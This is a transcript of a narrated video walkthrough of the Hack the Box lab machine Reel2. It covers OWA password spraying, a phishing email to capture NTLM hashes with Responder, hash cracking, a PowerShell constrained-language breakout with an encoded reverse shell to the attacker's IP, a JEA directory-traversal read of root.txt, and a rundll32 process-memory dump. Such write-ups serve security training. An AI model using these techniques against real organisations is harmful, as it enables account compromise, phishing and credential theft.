What's going on YouTube? This is Ipzak. We're doing Reel 2 from Hack the Box, which was a super fun box just like its predecessor, and it involves some type of phishing. But it doesn't start off with phishing. It starts off with you finding an OWA instance, but there's nothing really you can do. Further poking at the box reveals port 8080, which is running like a social media application. Use that to harvest a bunch of usernames to do a credential spray against OWA, and you get in with the password of summer 2020. Once on the box, you can spray all the users of the domain with a link. One of them clicks it, and if you have Responder or Metasploit set up to forward the HTTP to NTLM authentication, you can get a net NTLM v2 hash. Once you crack that, you have WinRM access to the box, but you're in constrained language mode. So you do a super simple breakout of constrained language, poke around the box, find credentials to a JEA, which I think is just enough access account. And that also has WinRM, but it is in no language mode, which is different than constrained. You can't easily break out of it, but you can abuse one of the pre-built functions that has a directory traversal vulnerability to access the root.txt. So with that being said, let's just jump in. As always, we're going to begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory if there was one, and then we'll call it reel2, and the IP address of 10.10.10.210, and I'm going to specify -v so it shows me open ports as it finds them, and I really thought I had nmap ran first. I've done this box before, but my prep for this box has been minimal because it is Friday at 3 o'clock. This video goes live in under 24 hours, so no pressure. Right off the bat, we see 80, 443, and 8080. So let's go to a web browser and check out 10.10.10.210 and see what this box is. We get a 403 forbidden. Let's take a look at HTTPS, so 10.10.10.210, and we get a certificate error. I always love looking at certificates, so we can look at view certificate, and the main thing I want to look for, right here, alternate names. So we get DNS names of reel2 and reel2.htb.local. So let's go add those to our host file in case it needs that. So 10.10.10.210, and we'll put both of those there. So now what I'm going to do is go back to HTTP and try reel2. Did I mean to go to HTTP? Yes, I did. 403 forbidden. Wait, whoops, I not mean HTTPS. HTTP reel2.htb.local. Is that going to load? What? I put them both. It's not case sensitive. Ping. What? Is my VPN down? Ping reel2. Something happened. It's not what I like seeing when I have very little time to do this video left. 10.10.10.210. Let's try ping 10.10.14.1. Okay, 10.10.10.2. The gateway's up. 210. I can ping the box, and I see the TTL of 127. So this is most likely going to be a Windows box. If you couldn't tell, if it was 63, I know it'd be Linux. Generally between 65 and 128, I assume Windows. If it's below 65, like 64 and below, I assume Linux. So let's see, reel2. Okay, so everything's working. I'm not sure exactly what that glitch was. Probably my internet connection or something. So I'm just going to run nmap again in case something died in the middle of nmap scanning. So we got reel2, let's try htb.local, and again, 403 access forbidden. So what I'm going to do is start a GoBuster. So make dir GoBuster, and we'll do GoBuster directory mode -u for URL, HTTP 10.10.10.210, word list, user share, word list. Actually, I like seclist, opt, seclist, discovery, web content, raf small words, and because this is a Windows box, I'm going to do -lowercase. The reason why I care about Windows being lowercase is Windows isn't a case-sensitive operating system, so not like doing a word list that mixes the casing is just like hitting the same URL twice and just takes more time. Okay, so we got URL, word list, we need output, so GoBuster, we'll call this http-root.log, and the extensions, I'm not going to specify any because it's just access denied. So, let's see, wildcard, everything's 403, let's see, let's do GoBuster-H, of course, directory mode-H, and we want status code, let's just say 200 or 302. Those are the two things we want. Or 301. Okay. So essentially we just changed the status codes for GoBuster because we don't care about all these 403 denieds. And 200's okay, and 301, 302 are redirects. Yeah. So while that goes, let's now go through the certificate, see if 443 is a different page. We just get a blank like Windows IIS page. So we can do a second GoBuster. So GoBuster directory mode-u. Let's just copy all this. So copy up to -L. Okay. We'll call this https root.log. And we specify HTTPS. And since this one isn't doing that weird like access forbidden on every page, I'm going to specify ASP and ASPX. This is going to take a little bit longer to do the GoBuster, and the only reason I'm specifying 2 extensions to try with every file in this is because I'm doing the lowercase file list. We can see the difference of words, lines in both of these. Certificate error, I think it follows curl syntax, which is -K. And we did get a hit already, OWA on 301, so that is a redirect. What I was saying, let's see, WC-L on lowercase, that is 38,000 lines. If we take out the lowercase, it's probably 50,000 or something, 43. So in this word list in specific, it doesn't save that much. If I did this before I ran GoBuster, probably wouldn't specify 2 extensions. But, oh well. So we know there's OWA. If we go to 10.10.10.210/OWA, we get a forbidden, but I bet if we do HTTPS, it allows us. That's weird that it's forbidden, but OWA probably redirected to /. Yeah, this is actually funny behavior. If we curl-V to show the header, the OWA is giving us a 301 redirect, and it's redirecting us to OWA/ and then giving us a 403 forbidden. It's probably just because OWA, which is Outlook Web Access, I think, it doesn't like plain text. So if we go to OWA on this, we get a page, I'd assume. Ping 10.10.10.210. Okay, I don't know why it's not working. Oh, there we go. Outlook Web App. So we don't have username password for this. So let's check out what that third port was. 8080. 210 8080. And we get a welcome to Wallstant. I'm going to go into the source code and see if we can see what CMS or something this is. And I don't really see anything there. The next thing is Googling Wallstant and see what it is. Open source PHP social network. So we can probably look at like searchpoint Wallstant to see if there's exploits. Doesn't look like there are. Wallstant exploit on Google. Wallstant. I'm not really seeing many. I'm sure there are exploits for this. But let's just take a look. We can try admin password to try log in. Username or email doesn't exist. We can do forgot password and check this out. No, we can't. It doesn't work. If you look at the link in the bottom left, it just goes to hashtag. So that link doesn't work. Let's try sign up. First name, IP, username, sec, or IPsec. We can do email root at ipsec.rocks. Password of, you guessed it, password. I know you were going to think I type please subscribe, but sometimes I typo that. So it's much easier to do password. So we create an account and we log in. Now, looking at this, there are two things that match up. We have access to a social network, which looks like an old version of Facebook, and Outlook. So I'm guessing this is some type of OS int challenge where we have to get usernames and then go to Outlook. Now, there's one thing I don't like about this box, and I think it's going to be how this is configured, but we'll get to that now, I guess. I was going to say in a second, but let's just go on a Outlook rant right now of a bunch of knowledge. So looking at this visually, I know this is Exchange 2010. If you Googled like OWA 2003 and go to image search, you can see what OWA 2003 looked like, 2008. We can see, maybe if we specify login, you can see this one's blue, 2010. We can see this looks like it matches exactly what we have. I don't think there's a 2012, but maybe 2013 is it. So in 2013, that's when it switched to this look. And then 2016, I don't think it changed much from 2013. And then I think there's probably a 2019. But yeah, very subtle differences until once you get past 2013. But 2010, I should say. But we know this is Outlook 2010. Now, the one thing I don't like about this is if we used Metasploit, we should be able to enumerate valid usernames. There is a, what is it? Like, like a time-based delay on valid accounts that is actually detectable. I don't think it works on this box, I'm not positive, but because Active Directory is installed in the same box Exchange is, so how I think this script works and where the vulnerability is Exchange knows all the valid user accounts because it has a list of the mailboxes. So when you try logging into OWA with an account that doesn't have a mailbox, it immediately just says access denied. When you specify a username that does have an active mailbox, it goes and queries Active Directory for the password because it knows it's a valid user. And if it's an invalid password, it says the same access denied message. But because upon a valid user account, when it goes over to AD, you're creating a time delay. And that's how I think scripts identify if it's a valid account or not. I'm not sure why Microsoft just doesn't make like every account go to AD to break that time delay, but yeah, I'm assuming that's it. It could also just be because of the configuration Hack the Box uses to have it like not spec'd out. I think this box has like 4 8 gigs of RAM and most Exchange boxes need like 32 or 64 gigs. So it could be related to just like the machine not having the specs it needs. But my assumption would be it's because of how AD is installed. And on this box, since AD is installed locally, there's really no delay when it detects, oh, this is a valid mailbox, let me query AD. It's all local, it's instant, so there's not much of a difference. I said a lot there. Hopefully it made sense. But I'm going to use OWA login, and we can show options, and I'm going to do something. Let's do v users. Let's see, administrator, guest, IPsec, does not exist. So what I want to do is have it say administrator is a valid account or guest. Sometimes they rename administrator. That's why I do both administrator and guest. But this just validates that our user enumeration is working. So we can say set user file user, I think is what I called it. Set user file user. Set password. Please subscribe. Set our host 10.10.10 to 10. We can run. One or more options. Fail to validate. PWD, IPsec real 2. What file is this? Users. There we go. Run. And there's two things. We see it's testing version OWA 2013. So I'm going to do show options. And we got this auxiliary action. Maybe I can do show action. search action. It's probably not going to be it. I don't know how to list all the actions, actually. How I found this is I grab this module, go to the source code of it, Metasploit, here we go. And then I search OWA 2013, and I can see all of these. So inbox check is right here. So we're going to do OWA 2010. So if I go back here, and we can set action OWA 2010. I think if I do invalid action, it also tells me. But now we run it. Yeah, I need casing. So capital OWA. So if you didn't look at the source and you just change action, it would tell you which ones you can do. We go to run it, and we still get this error. It's a SSL connect error. So what we can do is show options and look at SSL. It is set to true. Let's see. Maybe show advanced options to get us a little bit more. So here's all this. And there is this SSL version. So what I'm going to do is curl-k-v https 10.10.10.210, and I hope curl tells me what version of SSL I can use. What is taking so long? Do I have two open VPNs running? PSEF grep OpenVPN? I do not. Okay. Oh, I don't have a colon. There we go. TLS handshake failed. So SSL is not working here. Obviously, a browser works. So a browser is doing whatever SSL this allows. We could try viewing this. More information. TLS 1.2. It says. So let's go back to our Metasploit and look at SSL version. We can set TLS 1.2. So set SSL version TLS 1.2, run. Still get it. Let's do the good old brute force 1.1. Still errors. TLS 1. There we go. So now it's saying everything is valid. So username is valid for administrator, guest, IPsec, and does not exist. So we know we can't validate potential usernames, which sucks because I would have loved to be able to do that. We can see the login time. Let's see. Administrator is 4375 and does not exist is 438. So this account doesn't exist, but still took longer than this request. So there's really like no delay on identifying valid accounts. So there's no way we can even do this. But if we do have a valid credential, it will tell us. So at least we got that going for us. Let's now try to build a username list. So we have a way to spray Outlook. We need a way to generate usernames. So that's where this wall stand comes in. And what I want to do is search for files on this. So let's go back to our GoBusters. This one finished. Now let's just say 8080 root. And I think that's fine. .log. Wait, what? Oh, I didn't specify 8080. I did in the log file, not the URL. So we got a list of things. We got includes, login, JS. This /search seems good. So if we go over to /search, we have a bunch of things. So what I'm going to assume, just based upon like Smith, Johnson, Thompson, these look like potential last names. I'm going to assume maybe first name and then their username is their last name. Taylor's a weird last name, but I suppose it's possible. And what we have to do is be able to get all these names out. So let's go Control U at Miller. And let's see. /U Miller. So we got Alt Alex and then Miller. Now I'm just trying to think of a good way we can write a script to parse this because this spans lines, which is annoying. We could probably import in a beautiful soup in Python, and that would be quick if I knew all the beautiful soup syntax off the top of my head. Let's see. This follow button, does this have anything? Oh, wait. There we go. P and this. I think we can work with this. And an ugly bash one-liner. So, curl search. Now, I'm just going to grep from Miller so we only work with this. Let's see. Can I do grep-op? Let's see, P. Like that. And then space BR. Is that going to show me Alex? See, it's going to show me everything, not just what's highlighted. I'm sure there's a way I can do this regular expression. Oh well. Let's do this, and we'll stop it at /span. Okay, that's good. Now let's get rid of this grep Miller, and we will grep it on this user follow box. Grep this A. Awesome, we have a list of accounts. So now what we can do is probably the ugliest thing we'll see here today. Sed, get rid of P. Okay, sed, get rid of this. Shoot, it doesn't like these single quotes. Oh God. Style dot star question mark to that. That did not work. Let's see. We can get up to style, right? What I can do is double quote instead, so we can do single quotes easily. Yes, we can. Awesome. So that works. Like this. And let's see. I want to leave a space somewhere. We messed up somewhere. Maybe this space right here. There we go. And the last said to get rid of this. And there's probably 100 better ways to do this, but sometimes it just comes down to using nasty one-liners. There's a slash here, so I got to terminate that slash with a backslash. And now we have a list of first name and last name. User.lst. There we go. So if I cat this, that looks good. Now, the next step is to take this list and convert it into valid usernames, because right now we have a space separating first name and last name, and that's almost never going to happen in a username. So if this was a server where I could enumerate valid usernames from, I probably would start with one user and then try a bunch of formats. And then once I find the account structure, how they generally do names, I'd apply that one to them all. So I have a relatively small word list when it comes to users. But because I can't enumerate what is a valid username, I have to do it to all users. So to create a list of usernames, I'm going to go to GitHub and I'm going to search username anarchy. And we can pull this tool. So if we go to opt, get clone, pull this, or clone it, I guess, cd username. Let's see, is there requirements? There is not. Oh, this is Ruby, I think. Less username anarchy. Yeah, Ruby. So we can do username anarchy, input file, HTB real2, user.list, and we can select format. I'm just going to specify first to make sure this works. Now we can do first, then first.last. Awesome. And we can do just F for the first initial. I think it says somewhere in here, but let's do first initial last name, because that's also common, like F.Sanders. And sometimes they don't do a period, so let's just do F last. There we go. So now we have, for every username, grabbing just the first name dot last name, first initial dot last name, and first initial last name. Let's output this to a file. I'm going to put user2.list, cat user2.list. There we go. I'm always careful not to direct something into something I'm working with. So if I cat user.list now, LST, wait, I guess that would have worked because I'm doing it to a different file. But if I cat HTB real2 user.lst and then pipe that into itself, it deletes itself. So if I cat that, yeah. So that's why I always choose different output names, just in case we have a scenario like that. But we can copy user2.text to HTB real2 user.list. And now we can go back into Metasploit. Where is it? Do I have it open? I do, right here. So set user file user.lst, and we can run. And it's going to try, please subscribe with all the usernames. Please subscribe is probably not going to be a password. So what I'm going to do is go through all the seasons, because that's a super common schema. So set password, we'll say summer 2020. Run. And if you want a fun story of this, if you go to twitter.com/ipsec, and maybe I'll pin the tweet. I may remove my ipsec.rocks tweet, but I do. If you search for it, let's see what day it was. It's a super long thread, but it's a fun read of something I did a few days ago of a pen test and just live tweeted the actions. As you can see, there's a lot. But if you search for it on March 9th on my Twitter, it's a fun read. And here I am trying essentially the same thing. I add a exclamation point because of password complexity policy, requiring a symbol normally. But on this box, when I did it, it did not have a symbol at the end. So always try this, like season and then year. And you'll be surprised how often it works. And it's only like if you do season, year, and season, year, exclamation point, it's really not that many passwords to try brute forcing with, considering accounts will generally lock out after at minimum 4 times normally. So you can normally go through this in like 3 or 4 hours because you don't want to try too many. So I normally try 2 at a time and then separate it by 30 minutes apiece. So I try all the accounts once, and all the accounts, I put 2 invalid attempts, wait 30 minutes, do it again. And depending on how many user accounts you actually have, you may not have to wait. You may be able to just start it up again because it may take over 30 minutes to go through. So I'm going to try another season, autumn 2020. And then run this again. And then after autumn, you guessed it, I do spring and winter. But let's just run through this. And I'm going to speed the video up so we don't spend this time waiting. And as this ran, I actually think we may have a valid one. It was summer 2020. I thought it was autumn. S.S. then. Summer 2020. Weird. I think this is valid, but failed login. We may try a different toolkit. If I try to log in with this, so summer 2020 is on. Let's try HTTP, this. Wonder why that could fail. Let's see, logging in. It's taking a sweet time. Yeah, that's a valid password. I'm not sure why that says failed. I copied this. I didn't type it. Let's unset user file and set username s.svensson, set password summer 2020. Set action OWA 2013. Run. Okay, something is busted with that OWA 2010. Wait, OWA 2013 login. Yeah, so I don't know what we screwed up, but it was screwed up marvelously. By changing our default to 2010, which is what we assumed the banner was, it failed. Yeah, so I guess lesson learned, use 2013, even if it's a 2010 OWA instance. Actually bizarre. Unset username, set user file, user.list, run, and we can run through all these. And if you didn't want to use Metasploit, I generally recommend it. I normally don't run into that issue, but I don't see OWA 2010 too often anymore. But we can see it was valid, I think. I'm going to stop this since we can. Let's see. Yeah, successful login. You could have this stop upon successful login, or at the end, you could type creds. But if I do, it's going to dump a bunch of creds that I have in Metasploit that I don't feel like showing to the screen. So at home, type in creds, and anytime you like gather a cred in Metasploit, if it says like saving to creds, it's probably in a database somewhere, which is one of the cool things about Metasploit is it will do some of the like critical logging for you. But if you use the same machine for multiple purposes, you may unintentionally show things to your screen that you did not think were saved. So I don't want to run the creds, but that lesson learned. The other thing you could do is go to Spraying Toolkit and use this, a Python script that also works pretty well. So if we git clone this, go into Spraying Toolkit, Python 3 atomizer. Do I have everything? I do. So this will Spray, link, OWA, and IMAP. So we can do OWA, the target 10.10.10.210. The password, let's do summer 2010. The user file, let's do HTTP, real2, user.lst. And it's going to do essentially the same thing as the OWA and try to brute force the user. I may have to specify HTTPS. I can't remember if I need the full URL or not. Let's see, what is the example? Does he give like /OWA, link, OWA? Yeah, so he gives the full path. So we can do that. Oh, looks like it worked. Starting spray, yeah. So it found it. It automatically did HTTPS, found the domain name, and now it's spraying. And let's see. S.Svensson. Oh, I have summer 2010. Summer 2020. I had 2010 in my mind because of, I wonder if we just give it the auto discover URL if it's much quicker. Just 9 Python 3. Okay. Let's give it this. But yeah, in my head, I had 2010 because of OWA. I wonder if I made that mistake anywhere else. That. We can just specify real2. There we go. So much quicker if you specify that auto discover URL. And trying to stop it, I can't, but you saw it did it, and it dumped account to valid accounts. So both scripts work. Choose whatever one you like. Me personally, I generally used Metasploit because that's what I'm used to. But the spraying toolkit looks like it's pretty good. And you can count these accounts at the end and see it. It printed multiple because I did a Control-C, but both scripts work pretty amazingly. So with access to OWA, we can do the next step. So let's close all these windows, and we can see OWA is that German? Or I don't know what language that says. Google Translate, and I'm going to specify NIFT, Neat, Welsh. So, yeah, this next part can be me fumbling around and trying to remember the path on old Outlook. The first thing I go to when I have a domain user is I generally read messages or try to go through deleted messages. Ja? Maybe this is deleted. I don't know what I just did, but no. But I'd go through like deleted messages, see if I can recover any items. And if I can, maybe this one's recover. Let's see. Are there any? And just kind of gain a feel for the land. And in this case, I don't see anything. So I don't know what I'm supposed to do with this account, but I'm going to guess fish. So let's send an email. And Exchange has this thing called the global address book that will let us send emails to users. I wonder if I can just do like all users and check. Can I do like domain users? Check. Nope. If we click on this user completer, the book, is this going to open the gal for us? There's a way we can open the global address book. Maybe this. There we go. So we can dump all the users. It looks like there's multiple formats for names. Like Bob is Bob. We had some like, yeah, James, JEA test account. Weird. Sven is Sven at Hack the Box. Oh well. Looks like the account name is different than the username. But we can just right click this. Maybe copy, Control-C. What does this do? No. I don't want to open like 100 windows. Mail. Ja. There we go. So that's a way we can potentially email all the accounts, because I think that got everyone. and we can send them a message. Maybe I should like convert something to Welsh. Google Translate. And this part, definitely not needed. Hello, please validate remote access by going here. We will record your IP address. And our IP is 10.10.14.4, I think. And we can change this to this. It's always important when you do a phishing to try to blend in. Let's see. What's protocol? Remote access. This is probably why like all the spammers in your mailbox just have horrible language, because they do things like this, but in their language to English. So I bet anyone that can actually understand this language is going to laugh at how bad my phishing email is. But I assure you, if I wrote one in English, it would be good. Send the message, and what we forgot to do, nclvnp 80 sudo. We may want to send that message again if it's like instantaneously. Inbox. We got some undeliverables, I think. Let's do sent. No, it deleted itself. Hey, we got a connection back. So user agent, Windows PowerShell, but we know someone is going to this link. Now in Windows land, you can redirect them and grab a SMB hash. So if I do responder, sudo responder -i ton0, we can see HTTP options. It's not serving an executable, but it is starting a HTTP server. And when someone goes to this HTTP server, curl localhost, what? 127.0.0.1. Maybe I need to do this with sudo. I did do it sudo. There should be it listing on port 80. SSLNTP. Let's see, ton0. Oh, it's listening on ton0 port 80. Can I hit that? 10.10.14.4 80-V. Let's see. I wonder if it's doing something by user agent. So, oh, there we go. It's asking us to authenticate via NTLM. And when it does that, it directs us and gives an NTLM hash of the user that's logged in. So that is what this attack is. So let's go back to this address book. And we can click on everyone, send a message to all. And I'm not going to be as creative. I don't feel like translating that again. So we send this. And we'll see if anyone clicks. And Metasploit also has the option to do it. So I guess while this looks, search HTTP. This is going to give me so much. Maybe it's cred. Let's see. Word UNC injector. Oh, wow, there is a lot. It's probably going to be an auxiliary module, which will be near the top. Let's see. Search auxiliary. Can I just do, I guess I have to do use auxiliary, and we can go through the directories. There's a lot. Auxiliary gather, 112. HTTP, PDF authors, SMB, CRUD. Wow, there's a lot. No one hit my link yet. I wonder if I have to specify more information. Firefox prevented 38 pop-up windows. Send this. Protocol. Hey, please click the link. 10.10.14.4. I think that's what I sent last time. It should be listening to go. Let's see. Metasploit, HTTP, password, gather. Run post Windows. I don't think that's it. That's an ERP scanner. Auxiliary. Authentication capture, SMB. Maybe this is it. Server capture. Let's see what this is in here. Ah, we got a hash. Awesome. Just want to look at this real quick. Use. Oh, I've used twice. Capture. HTTP. Show options. And I think this will be similar. HTTP. NTLM. Show options. So, yeah. This does something similar to what we just did with the responder. So you can always check out these Metasploit options. Metasploit is a lot more powerful than people give it credit for, because people like avoiding Metasploit for whatever reason. But now we can try cracking this hash. So I'm going to do v hashes real2. We'll paste this in. And this is, does it tell us? NTLM v2. So if I do hashcat, hash examples, is it example hashes? Yeah. Less NTLM v2. It is mode 5600. So I can do /hashcat m5600 hashes real2 opt word list rocku.txt. And we should see if it will give us a result. Looks like it does. The screen scrolled pretty quickly. We can go up and see the password is kittycat1, or you can just get rid of the word list and do --show, and it will show you the hash. So we got k.svensson as kittycat1. So now we have to figure out how to use this. We could potentially log into his mailbox now. Let's get rid of these 39 pop-up windows. We're in s.svensson. I wonder who K is. How do I log out? That. To close all browser windows. Okay. Do /OWA. And we can check his account out. Copy. kittycat1. We log in, we look all around, and we don't see anything, even in this deleted. So that's kind of a dead end. If we go back to our nmap, so let's go in nmap, less real2.nmap, see what ports are open. We don't have 445. What's odd, I guess because the top 1,000 ports doesn't get updated that much, is nmap doesn't scan for WinRM, which is port 5985 and 5986, I want to say. So let's just check if that's open. Sudo nmap 10.10.10 210 5985 and 50. Let's just do 85 to 6000 and -v-n. Show me open ports as it finds it, and -n won't do DNS. We could have also done --open, which would hide these filters, but we have Windows remoting. So we can do evil winrm -u, u for username. It was k.svensson, -p for password, kittycat1, and -i for IP, 10.10.10.210. And we're going to do evil winrm. And we see it looks like it works, but we're getting like invoke expression is not recognized name of a commandlet. If we try anything like who am I or something, it just fails. So I'm going to do exit, and I'm going to put a bad password in and see if it says authentication failed. I'm assuming it will, which tells us we were good, just evil winrm didn't work. And it's probably because it loves doing this invoke expression, and maybe it's in like a constrained language mode or something's flagging and stopping us from using invoke expression. It's not even getting a shell now with this bad password. I'd expect it to, yeah, there we go, authorization failure. So we know we have a valid account, but we just don't have a way to really use it with this. So what we're going to do is some PowerShell on Linux, because now we can get like a remote session without depending on invoke expression from evil winrm. We could look at it to see if it has like a flag to not do invoke expression, like a basic winrm, but I don't see it. So what we want to do is pwsh to enter PowerShell on Linux. If I have too many problems, I may want to try upgrading, but can take some time, so I don't feel like doing it. I also want to get out of my nmap directory. The annoying thing whenever you do PowerShell remoting is it doesn't like passwords in plain text, so you kind of just memorize how to create a secure string. So pass is equal to that, secure string, kittycat1 as plain text, force, and then we can create the credential object by doing new object, system management automation ps credential htb/k.svensson, and then give it the pass. So now we got our credential object. So we should be able to enter ps session computer 10.10.10.210 -credential cred. And we get access denied. If we did this on Windows, I don't think we would. What I generally would do is like Google PowerShell remote Linux to Windows, I think. And we get a lot of these like SSH things. So I'm going to say -SSH to say hide results that say SSH, because we don't want to use SSH. And let's see. We have this quick breach, a GitHub issue, and this Thomas blog. Let's go look at this real quick. This is talking about like how to set up Windows, because I don't think we have like these winrm. This is using Docker. This is probably the correct way to do it, but it's going in a lot of stuff. I don't want to use that. This is an issue, but this is a super good blog post. Goes into like how to install PowerShell, various error messages you may get. Right now we have connection denied with NTLM. Use this authentication negotiate. And it says sometimes it won't be necessary from a Windows client. And here's the like GitHub issue from Linux. So let's add this. And we get this weird error message with GSS failure. And above it, it's talking about installing this package. So we can install it. And once this is installed, we should be able to PowerShell remote. So go through, and it takes its sweet time, but eventually I think it will give us a session as long as we didn't typo anything in the cred. There we go. So now we have a PowerShell session. We can do like who am I and let it finish the command, and it's probably going to tell us something does not work. Not recognize command or commandlet. What we can do is look at like env username and look through our environment to get our username if we wanted to. Of course, we should know who we are. Oh, is it colon username? env colon username. There we go. Yeah, K Svensson. So we could dig through the environment if we want. If we do GCI env colon star, is this going to dump every environment variable? Come on, get back. GCI is not recognized. GCI should be. So what we can look at is our execution context, like OE and constrained language mode. Context, session state, language mode. And we see we're in constrained language. So we have very limited commands we can use. Actually, it's a lie. We don't. You can escape constrained language mode, but if you ran git commands, you can see the commands you have natively. But there's also, is it git command? Maybe it's not commands, yeah. These are commands we should be able to use, at least in constrained language mode. However, if we go to Microsoft site and just do like about constrained language mode, there is a way to escape it. Here we go. It enables us to like just create a function and then do things, which is funny. All PowerShell elements of PowerShell scripting are permitted, whatever. There is a no language mode that we'll see a bit later on in this box that is a bit more restrictive. But since all objects in the scripting are enabled, if we, instead of just doing who am I, if we create a function and do who am I, it works. It's super silly. Wait for my command line to get back. Function, test, who am I? And now we defined a function for us to use. We should be able just to run test and who am I will work. So we can abuse this to get a reverse shell as PowerShell that's not in this mode. So let's do that. I'm going to copy user share nashang, and let's do shells invoke PowerShell TCP. I'm going to do oneline.ps1 because I want to make this as simple as possible, or not as simple, as small as possible. And I don't feel like typing this invoke thing all the time, so I'm going to call it rev.ps1. So let's edit rev.ps1, and we have two options. I generally always favor shorter options first when doing things in command line because sometimes you have a max number of characters you can do. So let's try this first one. Get rid of this IP. We are 10.10.14.4, and we want 9001. The other thing I want to show is we don't actually have to do function test. We can just do shorthand. I think this will work. It's just going to create the function and run it in one thing. So just a bit simpler. So I'm going to cat rev.ps1, and then to make it compatible with PowerShell, we have to convert it to iconv-t for target, or 2, however you want to remember that, UTF-16 little endian, because that's the format Windows likes. And the main difference is if we do XXD here, you can see everything is just 1 byte. When we run this iconvert command, everything becomes 2 bytes. And that's how PowerShell likes it. Just a weird oddity, but you get used to it. So we have this converted. I suppose there's no equals. Let's try running this. I'm just going to make sure this is what I think it is. 9001 should be fine. So now let's do how I did before. PowerShell ENC for encoded command, and we run it, and we get a shell. We do who am I, K Svensson. Maybe I don't like this shell. I'm not a fan of it, like how this is working. Maybe if I do RL wrap beforehand, read line wrap, is that going to work better? Let's go up, copy, paste. I went on separate lines. That is annoying. I want to have the up arrow in this shell. Come on. I hit enter too many times. This slowness. Okay. I had the up arrow. I could just type up. Sometimes it's always simpler. Who am I? Yeah, I don't like how this is like, the shell is janky, to say the least. So let's go and copy this thing back and do the other one. So let's do this top shell. And instead of this IP, we can do 10.10.14.4, port 9001, base 64. Yep. And let's try this. So copy PowerShell ENC like that. NC LVMP 9001. Run this again. And who am I? This looks like a much, much better shell. I can't do like Control L to clear screen, so I'm going to try RL wrap to see if I can get that working. If not, it's not the end of the world. I just like having that functionality. Hey, I think that's how it works. I think that fixed it. Who am I? Yep, awesome. So now we have a normal shell in the box that we can run any PowerShell command we want, which is awesome. So let's take a look around. Looking in documents, we have this JEA test account. And back when we did like that GAL thing, the global address list, we did see something about JEA test. We can do net user JEA test account and see information about it. It is a member of domain users, but we can, in fact, see it exist. It has a PSRC, which is like the init for an account, like initialization. RC, I think, generally stands for run command, like run command as soon as you log in. We can type it out to see what it is. It's a bit painful to read with all these comments. So what we can do is say select string dash not match and say if it begins with a comment. And then we want to select string on period to grab only lines. So this is a bit easier. We can see Cube created this, and it's got a function, which is check file, and it's going to make sure check file exists in D colon or path of C colon program data. So this is when I'm going to try changing directories to D, and I can't. So I guess this may come in later. If we look at the other one, instead of PSRC, it was SC. This is, I forget what SC stands for, but it's defining the configuration, maybe like shell configuration. We can see it's applying the role capability JEA test account to that account. And I'd assume this account is in no language mode. And this is the only command it can run. So this is probably defining the role for JEA test account, and JEA test account can run these functions, which is only check file, and yeah. But the issue is we don't have JEA test account's password, so we can't really even use this yet. If we go onto the desktop to go grab user.txt, we see some interesting things. We see Process Explorer 64, sticky notes, sysmon, user.txt. We can grab the user flag if we wanted to at this point. But the sticky notes is interesting. Sticky notes, I think maybe we can pull up a picture of it. If we copy, go here, Google, sticky notes, image. It puts like sticky note Windows program puts like sticky notes on your desktop. So we can probably use Process Explorer. If we look at task list, maybe like get task would have been better. Maybe get task list. Is it get task or to get task list? dir get task list. PowerShell list processes. Get process. We can see that Sticky Notes is running. And I think we could probably use Process Explorer to dump the Sticky Notes memory. Or we can use like run DLL32 to dump it. See, handle ID. So here are all the IDs of Sticky Notes. Instead of dumping it, maybe we'll do that at the end of the video, if I can remember the command. I learned a command doing analysis on like people hacking Exchange, and they used a run DLL command to dump the process of LSASS. I thought it was pretty interesting, but I don't have it off the top of my head yet because I just learned it like 2 days ago. So yeah. If we go into app data, which is where application data is generally stored, we can look at each of these folders. We got Sticky Notes updater, local low, and dir roaming. We got just this Sticky Notes. So if we go into the Sticky Notes, app data is where like application data is going to be stored, and it's under the user, so it's stored under that user. The roaming directory is when the user logs into a different computer. It's his like profile roaming, and it copies this directory to the new computer as well. So he has the same thing across multiple computers. If we go into, let's see, like local storage, we have maybe local storage level DB. We have a pretty big log file. If we look at it, so if we type 003, we get a bunch of junk. I think if we type the stir.log and we pipe it over to format-hex, we can get a hex dump of this file. And if we look at the hex dump of the file, we can see more of what it is. So this is a JSON blob, and this is what's on the actual sticky note. So we can see it's doing an HTML, giving the color of the sticky note an RGB format, red, green, blue, probably the color of the text, the site, the height of the thing, the width of the sticky note. If it's deleted, no. So even if the sticky note was deleted, we could potentially retrieve it by going into this. But there is a sticky note on this guy's desktop, credentials for JEA, and here's the password. So let's grab this. And it began with an A. I think it was a capital A. It just spanned lines. So A, whatever. So what I'm going to do is we'll try logging in with this account. Copy, rename this window to, is it k.svensson? And this will be JEA. So PWSH, we got to convert this pass. So convert to secure string, pipe the password in, or paste it in as plain text force. Credential object is going to be new object, system, management, automation, PS credential, HTTP, JA test account. And then the password. Just want to make sure my credential object's good. And we can do enter PS session computer 10.10.10.210 credential cred authentication negotiate, and we get access denied. And when using these constrained language modes are just enough privilege, I think it's JEA token, that what we saw before, you also have to specify the configuration name. If you go in Google, like enter PS session, and look at like the man pages, you can see exactly what that is. But if we assume the configuration names, what was in the PSRC file, which was just JEA test account, we can try logging in with WinRM and specify to use this profile for the account. And I think it should let us in. But now if we do the, what is it? Execution context dot session state language mode, it should say no language. It's not even supported. It doesn't say no language mode, but the error message says the run space is in no language mode. So we can only do what is defined. If I do a git command, we can see what commands are available, and very, very few. There is check file though. If we go back to K Svensson, so cd slash users k dot Svensson documents and type this RC. We need select string no match like that, and select, I think I can just do string period. What? Type JEA, select string, no match. I'm not sure what's going on, but let's just look at this script block. So this is the check file, allowing the computer. So it wants the path like either d:\/ or c: program data. And then it does star. So as long as our path has c: program data, we should be good. So it may have a LFI vulnerability. So if we do check file, c: program data, and we can try a file we know exists, Windows System 32, was it license.rtf? It's just a file I know always exists on Windows. It's the license agreement. So we can verify we have a directory traversal. If we just try going to this file, it's not going to work because the check file command, the license is pretty big, but actually the check file command's here. It requires it being like that. So if we go back to this program data, we can do .. administrator desktop root.txt. Does not exist. Administrator root.txt does not exist. Let's try desktop. Oh, I did program data and I need users. There we go. And we can get the flag this way. I don't think there's a way to actually get his password or anything to log in and get a shell. So that's unfortunate, but at least we got the root flag. There was one thing I wanted to go back to, and that was dumping the memory. So let's see if we can figure out that run DLL command. Going back to my favorite resource, Google, I'm just going to Google run DLL32 dump process. And let's see. This looks good. I remember seeing this com svcs and the stuff. So let's see, proc dump, native DLL. There we go. This is the command we want. So let's go back to K Svensson and it was get process. And we have this command. We can dump it to c:\users k Svensson /documents test.dmp. So this is running run-dll. It's going into this probably common services.dll, executing the mini dump function, taking the process ID, and dumping it to the file, and we want the full dump. So let's look at sticky. And is that size? CPU. Let's just try 5732. Let's try dumping each of these. So 5732. Did it dump? 